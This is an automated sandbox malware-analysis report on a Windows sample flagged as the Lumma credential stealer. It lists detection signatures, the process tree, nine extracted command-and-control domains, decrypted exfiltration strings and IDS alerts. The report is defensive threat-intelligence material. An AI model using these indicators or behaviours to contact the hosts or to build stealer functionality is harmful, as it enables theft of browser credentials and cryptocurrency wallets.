Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UhsjR3ZFTD.exe

Overview

General Information

Sample name:UhsjR3ZFTD.exe
renamed because original name is a hash value
Original sample name:639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620.exe
Analysis ID:1583096
MD5:51648584ffb4a6398eb1cef4da20e457
SHA1:74f2facfc001a0b4f23b8d4ce24208aa0c5f84e2
SHA256:639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620
Tags:exeuser-Chainskilabs
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • UhsjR3ZFTD.exe (PID: 5484 cmdline: "C:\Users\user\Desktop\UhsjR3ZFTD.exe" MD5: 51648584FFB4A6398EB1CEF4DA20E457)
    • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • UhsjR3ZFTD.exe (PID: 3960 cmdline: "C:\Users\user\Desktop\UhsjR3ZFTD.exe" MD5: 51648584FFB4A6398EB1CEF4DA20E457)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "noisycuttej.shop", "nearycrepso.shop", "tirepublicerj.shop", "wholersorie.shop", "framekgirus.shop", "fancywaxxers.shop", "rabidcowse.shop"], "Build id": "Zv86PG--UzeRR"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2181607562.0000000002E95000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.2181670779.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: UhsjR3ZFTD.exe PID: 3960JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: UhsjR3ZFTD.exe PID: 3960JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T22:04:57.607657+010020283713Unknown Traffic192.168.2.649712104.21.32.1443TCP
                2025-01-01T22:04:58.679432+010020283713Unknown Traffic192.168.2.649713104.21.32.1443TCP
                2025-01-01T22:04:59.945904+010020283713Unknown Traffic192.168.2.649714104.21.32.1443TCP
                2025-01-01T22:05:01.080623+010020283713Unknown Traffic192.168.2.649715104.21.32.1443TCP
                2025-01-01T22:05:02.222016+010020283713Unknown Traffic192.168.2.649717104.21.32.1443TCP
                2025-01-01T22:05:04.498341+010020283713Unknown Traffic192.168.2.649718104.21.32.1443TCP
                2025-01-01T22:05:05.841345+010020283713Unknown Traffic192.168.2.649720104.21.32.1443TCP
                2025-01-01T22:05:08.033859+010020283713Unknown Traffic192.168.2.649736104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T22:04:58.143694+010020546531A Network Trojan was detected192.168.2.649712104.21.32.1443TCP
                2025-01-01T22:04:59.155272+010020546531A Network Trojan was detected192.168.2.649713104.21.32.1443TCP
                2025-01-01T22:05:08.503939+010020546531A Network Trojan was detected192.168.2.649736104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T22:04:58.143694+010020498361A Network Trojan was detected192.168.2.649712104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T22:04:59.155272+010020498121A Network Trojan was detected192.168.2.649713104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T22:04:57.607657+010020586571Domain Observed Used for C2 Detected192.168.2.649712104.21.32.1443TCP
                2025-01-01T22:04:58.679432+010020586571Domain Observed Used for C2 Detected192.168.2.649713104.21.32.1443TCP
                2025-01-01T22:04:59.945904+010020586571Domain Observed Used for C2 Detected192.168.2.649714104.21.32.1443TCP
                2025-01-01T22:05:01.080623+010020586571Domain Observed Used for C2 Detected192.168.2.649715104.21.32.1443TCP
                2025-01-01T22:05:02.222016+010020586571Domain Observed Used for C2 Detected192.168.2.649717104.21.32.1443TCP
                2025-01-01T22:05:04.498341+010020586571Domain Observed Used for C2 Detected192.168.2.649718104.21.32.1443TCP
                2025-01-01T22:05:05.841345+010020586571Domain Observed Used for C2 Detected192.168.2.649720104.21.32.1443TCP
                2025-01-01T22:05:08.033859+010020586571Domain Observed Used for C2 Detected192.168.2.649736104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T22:04:57.123034+010020586561Domain Observed Used for C2 Detected192.168.2.6645451.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-01T22:05:04.933530+010020480941Malware Command and Control Activity Detected192.168.2.649718104.21.32.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://fancywaxxers.shop/apidAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiMAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apixt.default-release/key4.dbPKAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apilAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiEAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apitPKAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/9Avira URL Cloud: Label: malware
                Source: 00000000.00000002.2112928095.00000000030F1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "cloudewahsj.shop", "noisycuttej.shop", "nearycrepso.shop", "tirepublicerj.shop", "wholersorie.shop", "framekgirus.shop", "fancywaxxers.shop", "rabidcowse.shop"], "Build id": "Zv86PG--UzeRR"}
                Source: UhsjR3ZFTD.exeReversingLabs: Detection: 31%
                Source: UhsjR3ZFTD.exeJoe Sandbox ML: detected
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Zv86PG--UzeRR
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_00419362 CryptUnprotectData,3_2_00419362
                Source: UhsjR3ZFTD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49736 version: TLS 1.2
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006DB358 FindFirstFileExW,0_2_006DB358
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 0_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006DB409
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006DB358 FindFirstFileExW,3_2_006DB358
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 3_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_006DB409
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]3_2_00426000
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]3_2_0040C22D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_00419362
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h3_2_0043FB80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]3_2_0043DCE9
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_0043DCE9
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah3_2_00440480
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov esi, edx3_2_00408640
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042BE8A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]3_2_0042BE8A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h3_2_0042A050
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]3_2_0043E051
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]3_2_0043E850
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then jmp ecx3_2_0043D818
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h3_2_00419820
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00419820
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F830
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F0CB
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042C0CD
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]3_2_00415882
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h3_2_00415882
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h3_2_004398A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh3_2_004390A0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042C140
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh3_2_00416148
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]3_2_00416148
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00416148
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00416148
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [edi], cx3_2_0042895A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov ecx, eax3_2_0042895A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx esi, word ptr [eax]3_2_00424974
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00424974
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00428100
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h3_2_00440130
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then jmp ecx3_2_004229CD
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004229CD
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_0043E19A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042C1A3
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]3_2_0043C1B0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F1B0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427A5A
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [edi], ax3_2_0041CA60
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [edi], ax3_2_0041CA60
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]3_2_0043E262
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]3_2_00423A60
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042C26C
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]3_2_0042C26C
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0042BA79
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F2F6
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042C282
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]3_2_0042C282
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]3_2_0043EA80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00429A90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00426340
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]3_2_00426340
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B60
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]3_2_00426360
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00426360
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427B08
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F330
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]3_2_004073C0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]3_2_004073C0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F3C0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]3_2_0041C3CC
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then push esi3_2_00420BD3
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then test eax, eax3_2_004393D0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [eax], dl3_2_0042238D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then jmp ecx3_2_0042238D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov edx, eax3_2_0043C440
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F450
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]3_2_00439C70
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00435410
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]3_2_00421C80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]3_2_00416C90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h3_2_004274A5
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]3_2_00427CB0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427CB0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov esi, ecx3_2_0043C510
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then test eax, eax3_2_0043C510
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h3_2_0043C510
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]3_2_00414DC0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]3_2_00416C90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]3_2_004155DB
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov ecx, eax3_2_0041AD80
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h3_2_0043FE20
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [ecx], bp3_2_0041CECA
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]3_2_0043E6E0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]3_2_0040C6F0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_00408EF0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DE90
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_00418740
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [edi], dx3_2_00414777
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041BFCA
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]3_2_004237D0
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]3_2_00417FE1
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]3_2_00417FE1
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00416F8D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov edx, ecx3_2_00416F8D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00416F8D
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]3_2_00424F91
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00424F91
                Source: C:\Users\user\Desktop\UhsjR3ZFTD.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]3_2_0043DFB3

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.6:64545 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49718 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49713 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49714 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49712 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49717 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49715 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49736 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49720 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49718 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49736 -> 104.21.32.1:443
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: fancywaxxers.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
